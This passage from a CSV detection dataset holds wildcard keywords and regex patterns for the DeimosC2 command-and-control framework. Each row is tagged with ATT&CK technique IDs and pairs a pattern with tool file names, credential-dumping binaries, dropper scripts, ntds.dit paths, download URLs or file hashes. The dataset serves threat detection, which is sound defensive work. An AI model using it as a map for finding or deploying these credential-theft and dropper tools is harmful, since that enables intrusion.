T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63623" "*/bin/samdump.elf*",".{0,1000}\/bin\/samdump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63624" 
"*/c2VuePlugin.js*",".{0,1000}\/c2VuePlugin\.js.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63625" "*/DeimosC2-Migration/*",".{0,1000}\/DeimosC2\-Migration\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63626" "*/DeimosC2.git*",".{0,1000}\/DeimosC2\.git.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63627" "*/DeimosC2/releases/download/*",".{0,1000}\/DeimosC2\/releases\/download\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63628" "*/DeimosC2/releases/tag/*",".{0,1000}\/DeimosC2\/releases\/tag\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63629" "*/DeimosC2/tarball/*",".{0,1000}\/DeimosC2\/tarball\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63630" "*/DeimosC2/zipball/*",".{0,1000}\/DeimosC2\/zipball\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63631" "*/lsadump.elf*",".{0,1000}\/lsadump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63632" "*/lsadump.exe*",".{0,1000}\/lsadump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63633" "*/lsassparse.py*",".{0,1000}\/lsassparse\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for 
post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63634" "*/modules/credentialaccess/lsadump/server/*",".{0,1000}\/modules\/credentialaccess\/lsadump\/server\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63635" "*/ntdsdump.exe*",".{0,1000}\/ntdsdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63636" "*/ondisk_dropper_tcp.pl*",".{0,1000}\/ondisk_dropper_tcp\.pl.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63637" "*/ondisk_dropper_tcp.ps1*",".{0,1000}\/ondisk_dropper_tcp\.ps1.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63638" "*/ondisk_dropper_tcp.py*",".{0,1000}\/ondisk_dropper_tcp\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63639" "*/ondisk_dropper_tcp.sh*",".{0,1000}\/ondisk_dropper_tcp\.sh.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63640" "*/samdump.exe*",".{0,1000}\/samdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63641" "*/screengrab.elf*",".{0,1000}\/screengrab\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63642" "*/screengrab.exe*",".{0,1000}\/screengrab\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control 
framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63643" "*/server/bin/minidump.elf*",".{0,1000}\/server\/bin\/minidump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63644" "*/server/bin/minidump.exe*",".{0,1000}\/server\/bin\/minidump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63645" "*/shadowdump.elf*",".{0,1000}\/shadowdump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63646" "*/shadowdump.exe*",".{0,1000}\/shadowdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63647" 
"*/TCPAgent_Win_32_ARM.exe*",".{0,1000}\/TCPAgent_Win_32_ARM\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63648" "*/TCPAgent_Win_32_Intel.exe*",".{0,1000}\/TCPAgent_Win_32_Intel\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63649" "*/TCPAgent_Win_64_ARM.exe*",".{0,1000}\/TCPAgent_Win_64_ARM\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63650" "*/TCPAgent_Win_64_Intel.exe*",".{0,1000}\/TCPAgent_Win_64_Intel\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63651" "*\\Windows\\temp\\ntds.dit*",".{0,1000}\\\\Windows\\\\temp\\\\ntds\.dit.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - 
T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63652" "*\lsadump.exe*",".{0,1000}\\lsadump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63653" "*\lsassparse.py*",".{0,1000}\\lsassparse\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63654" "*\ntdsdump.exe*",".{0,1000}\\ntdsdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63655" "*\ondisk_dropper_tcp.ps1*",".{0,1000}\\ondisk_dropper_tcp\.ps1.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63656" "*\ondisk_dropper_tcp.py*",".{0,1000}\\ondisk_dropper_tcp\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and 
control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63657" "*\ProgramData\nice.exe*",".{0,1000}\\ProgramData\\nice\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63658" "*\samdump.exe*",".{0,1000}\\samdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63659" "*\screengrab.exe*",".{0,1000}\\screengrab\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63660" "*\shadowdump.exe*",".{0,1000}\\shadowdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63661" 
"*\TCPAgent_Win_32_Intel.exe*",".{0,1000}\\TCPAgent_Win_32_Intel\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63662" "*\TCPAgent_Win_64_ARM.exe*",".{0,1000}\\TCPAgent_Win_64_ARM\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63663" "*\TCPAgent_Win_64_Intel.exe*",".{0,1000}\\TCPAgent_Win_64_Intel\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63664" "*\Windows\temp\ntds.dit*",".{0,1000}\\Windows\\temp\\ntds\.dit.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63665" "*044d2914795e5dc9378bd767a29f2deebdb32c8a2db415ac504c5428f81de131*",".{0,1000}044d2914795e5dc9378bd767a29f2deebdb32c8a2db415ac504c5428f81de131.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for 
post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63666" "*0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e*",".{0,1000}0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63667" "*1420de564b25985385c3209a398cabd80c5473848182a3e976732e91cbc40b9c*",".{0,1000}1420de564b25985385c3209a398cabd80c5473848182a3e976732e91cbc40b9c.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63668" "*195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c*",".{0,1000}195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63669" 
"*1c9f784990a6ae66b1b7d2a08ae61c9368976dd76e9b72bd33869ea203b085ad*",".{0,1000}1c9f784990a6ae66b1b7d2a08ae61c9368976dd76e9b72bd33869ea203b085ad.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63670" "*2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7*",".{0,1000}2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63671" "*3034d881af1372a28215e637e68b0ffebf04eb3276b63de033a0003af9d59b80*",".{0,1000}3034d881af1372a28215e637e68b0ffebf04eb3276b63de033a0003af9d59b80.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63672" "*32d2e39edb2747db3ae9ba09bad40c8fa80ba2e3d7aefc1ea9613c4e83d01f67*",".{0,1000}32d2e39edb2747db3ae9ba09bad40c8fa80ba2e3d7aefc1ea9613c4e83d01f67.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63673" "*3c3fa67b5e58473e215cb5544b6ec8ce39c7ca0d661751f9a21baaf383890e2d*",".{0,1000}3c3fa67b5e58473e215cb5544b6ec8ce39c7ca0d661751f9a21baaf383890e2d.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63674" "*42bc3712059b3251b41d7bba811f74626e37f57cc1781d48b89793f9f9ba917f*",".{0,1000}42bc3712059b3251b41d7bba811f74626e37f57cc1781d48b89793f9f9ba917f.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63675" "*569af95286b2d2043e4a095fa63d1b10691a76330c651665c9f8bbee6643ee27*",".{0,1000}569af95286b2d2043e4a095fa63d1b10691a76330c651665c9f8bbee6643ee27.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63676" "*6bdd1093cd978498d0b18ae40e0f424b61d20eba23a2fd6aee81e1209e0984a9*",".{0,1000}6bdd1093cd978498d0b18ae40e0f424b61d20eba23a2fd6aee81e1209e0984a9.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for 
post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63677" "*7c46e89837f36cfecf76b21b4cb9847a273990baf740a4ac6c8a20a443a37d9d*",".{0,1000}7c46e89837f36cfecf76b21b4cb9847a273990baf740a4ac6c8a20a443a37d9d.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63678" "*7fa888cebc08b2871fbbece2b445a754f5954f34519fe9dc581fbbaf061359bd*",".{0,1000}7fa888cebc08b2871fbbece2b445a754f5954f34519fe9dc581fbbaf061359bd.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63679" "*8049e0849ef3516e367f830151bf520886d715d6be117665c5c199a9332a2353*",".{0,1000}8049e0849ef3516e367f830151bf520886d715d6be117665c5c199a9332a2353.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63680" 
"*8807ad8abba7a1cf8776296b8909c6852cd9076388b881180bd985c16b46cc33*",".{0,1000}8807ad8abba7a1cf8776296b8909c6852cd9076388b881180bd985c16b46cc33.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63681" "*98325ea7c7befdee51f22715eb8b5bbfe94aef5bb5ba247b7e13fb0aae55e156*",".{0,1000}98325ea7c7befdee51f22715eb8b5bbfe94aef5bb5ba247b7e13fb0aae55e156.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63682" "*c:\\temp\\agent.exe*",".{0,1000}c\:\\\\temp\\\\agent\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63683" "*c:\temp\agent.exe*",".{0,1000}c\:\\temp\\agent\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 